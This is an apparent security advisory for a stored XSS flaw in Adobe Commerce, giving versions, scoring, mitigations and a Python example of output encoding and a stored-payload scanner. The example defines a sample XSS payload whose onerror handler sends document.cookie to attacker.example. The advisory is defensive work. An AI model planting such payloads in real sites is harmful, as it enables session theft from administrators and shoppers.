Platform: adobe
Component: adobe-commerce
Fixed in: 2.4.5-p15, 2.4.6-p13, 2.4.7-p8, 2.4.8-p3, 2.4.9-alpha3
CVE-2026-21284 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce. An attacker who already holds a high-privileged account can save a malicious script into vulnerable form fields; the script later executes in the browser of other users who view the stored content, which can lead to session takeover and loss of data integrity. Adobe lists the fixed releases as 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13 and 2.4.5-p15. The accompanying text gives the affected range as 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, and 2.4.4-p16 and earlier; since a release cannot be both the fix and the last affected build, treat any build below the listed fix level on your branch as affected and confirm the exact boundaries in the Adobe bulletin. No fix is listed for the 2.4.4 branch, so sites on 2.4.4-p16 or earlier need to move to a supported branch.
Stored XSS means the injected script is persisted by the application, here in a form field an elevated user can edit, and runs in the browser of anyone who later loads a page that renders that field; the victim does not have to submit anything. Running in that browser context, the script can act with the victim's session: issue authenticated requests, read anything the page can read, exfiltrate data, deface storefront or admin pages, or redirect users to attacker-controlled sites. Whether it can read the session cookie directly depends on cookie flags such as HttpOnly, but a script that can send requests as the victim is a session takeover in practice. The "high-privileged attacker" wording corresponds to CVSS Privileges Required: High, meaning the attacker must already hold an elevated Adobe Commerce account to plant the payload. The payload then fires for other administrators and staff who view the affected page, so a single compromised, malicious or over-privileged account becomes a foothold against every other elevated account.
CVE-2026-21284 was publicly disclosed on March 11, 2026. There is no indication of active exploitation at this time, and it is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No public proof-of-concept is available, but stored XSS payloads are trivial to construct once the affected field is known, so the absence of a PoC is no reason to defer patching. Note what the two scores measure: the CVSS base score of 8.1 (HIGH) rates severity, while the EPSS estimate of 0.10% (28th percentile) rates the probability of exploitation in the wild over the next 30 days as low. Prioritize on severity and exposure (how many elevated accounts exist and how widely the stored content is rendered), not on the EPSS number alone.
Exploit Status: no known active exploitation; not listed in CISA KEV
EPSS: 0.10% (28th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-21284 is to upgrade Adobe Commerce to the fixed release for your branch; Adobe recommends the latest available version. If you cannot upgrade immediately, the following reduce exposure but do not remove the flaw. A Web Application Firewall rule set that blocks common XSS payloads on the admin form endpoints is a stopgap only; expect signature bypasses. Adobe Commerce's built-in Content Security Policy module, when enforced in restrict mode, blocks inline and unlisted scripts and so limits what an injected payload can do. Because exploitation requires an elevated account, tighten the admin surface: minimise the number of admin users, enforce two-factor authentication, restrict admin access by network, and review admin activity logs. Output encoding in any custom templates (escaping stored values for the HTML text, attribute or JavaScript context they land in) is the correct fix for code you own, but it does not patch the vendor code path. Finally, patching does not remove payloads that were stored before the upgrade: review admin-editable content for script tags, inline event handlers and javascript: URLs.
Update Adobe Commerce to the latest available version. Refer to the Adobe security bulletin for more details and specific upgrade instructions.
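To make the mitigation concrete, here is an added Python example; it is not Adobe code and does not reproduce the undisclosed vulnerable code path. It shows the raw interpolation that makes a stored field dangerous beside context-specific encoding for HTML text, HTML attributes and JavaScript strings, and a small audit routine for finding script payloads already persisted in admin-editable fields, which patching alone does not remove. The field names, the sample rows and the payload are constructed for illustration.

```python
"""Added example, not Adobe code: contextual output encoding for
admin-entered values, plus a scan for script payloads already persisted
in admin-editable fields. Field names, rows and payload are constructed."""
import html
import json
import re
from html.parser import HTMLParser

# Constructed sample of what a malicious high-privileged user might save
# into a text field such as a CMS block title.
STORED_PAYLOAD = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)


def render_unsafe(field_value: str) -> str:
    """The stored-XSS pattern: persisted text interpolated into HTML as-is."""
    return f'<td class="title">{field_value}</td>'


def render_html_body(field_value: str) -> str:
    """HTML text context: & < > " ' become entities, so no tag can open."""
    return f'<td class="title">{html.escape(field_value, quote=True)}</td>'


def render_html_attr(field_value: str) -> str:
    """Attribute context: same entity escaping, and the attribute is always
    quoted so a value cannot break out and add an on* handler."""
    return (
        '<input type="text" name="title" '
        f'value="{html.escape(field_value, quote=True)}">'
    )


def render_js_string(field_value: str) -> str:
    """JavaScript string context: JSON-encode (quotes, backslashes, control and
    non-ASCII characters escaped) and neutralise "</" so the value can never
    close the enclosing <script> element."""
    encoded = json.dumps(field_value).replace("</", "<\\/")
    return f"<script>var title = {encoded};</script>"


class _ScriptSink(HTMLParser):
    """Collects script elements, inline event handlers and javascript: URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag == "script":
            self.findings.append("script element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"inline handler {name}")
            elif name in ("href", "src", "action", "formaction") and value:
                if re.match(r"\s*javascript:", value, re.IGNORECASE):
                    self.findings.append(f"javascript: URL in {name}")


def scan_record(record: dict, fields) -> dict:
    """Return {field: [findings]} for every string field with script content."""
    hits = {}
    for field in fields:
        value = record.get(field)
        if not isinstance(value, str):
            continue
        sink = _ScriptSink()
        sink.feed(value)
        sink.close()
        if sink.findings:
            hits[field] = sink.findings
    return hits


def scan_records(records, fields, id_field="id"):
    """Audit exported rows; returns [(id, hits)] for the rows that are flagged."""
    flagged = []
    for record in records:
        hits = scan_record(record, fields)
        if hits:
            flagged.append((record.get(id_field), hits))
    return flagged


# Constructed stand-in for a dump of an admin-editable table.
SAMPLE_ROWS = [
    {"id": 1, "title": "Spring sale", "content": "<p>20% off</p>"},
    {"id": 2, "title": STORED_PAYLOAD, "content": "plain"},
    {"id": 3, "title": "Help", "content": '<a href="javascript:alert(1)">x</a>'},
]

if __name__ == "__main__":
    print(render_unsafe(STORED_PAYLOAD))      # payload survives intact
    print(render_html_body(STORED_PAYLOAD))   # rendered as inert text
    for row_id, hits in scan_records(SAMPLE_ROWS, ["title", "content"]):
        print(row_id, hits)
```

In Adobe Commerce templates the counterparts of the three encoders are the framework Escaper methods `escapeHtml`, `escapeHtmlAttr` and `escapeJs`, chosen by the context the value is written into. The audit routine is meant to run over an export of the tables behind the affected form; the bulletin does not name the field, so scan every admin-editable text column, and treat the parser-based check as a triage aid rather than a complete filter.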
CVE-2026-21284 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce that lets a high-privileged attacker save scripts into form fields that are later rendered to other users.
You are affected if you run a release below the fixed level for your branch (2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15); the 2.4.4 branch is affected through 2.4.4-p16 and has no fix listed. Confirm the exact affected builds against the Adobe bulletin.
Upgrade Adobe Commerce to the fixed release. If you cannot patch immediately, use WAF rules, Content Security Policy in restrict mode and tighter admin-account controls as temporary measures, and audit previously stored admin content after patching.
There is currently no indication of active exploitation or public proof-of-concept code, but a stored XSS payload is simple to construct once the affected field is known.
Refer to the official Adobe Security Bulletin for details: [https://www.adobe.com/security/bulletins/adobe-commerce.html](https://www.adobe.com/security/bulletins/adobe-commerce.html)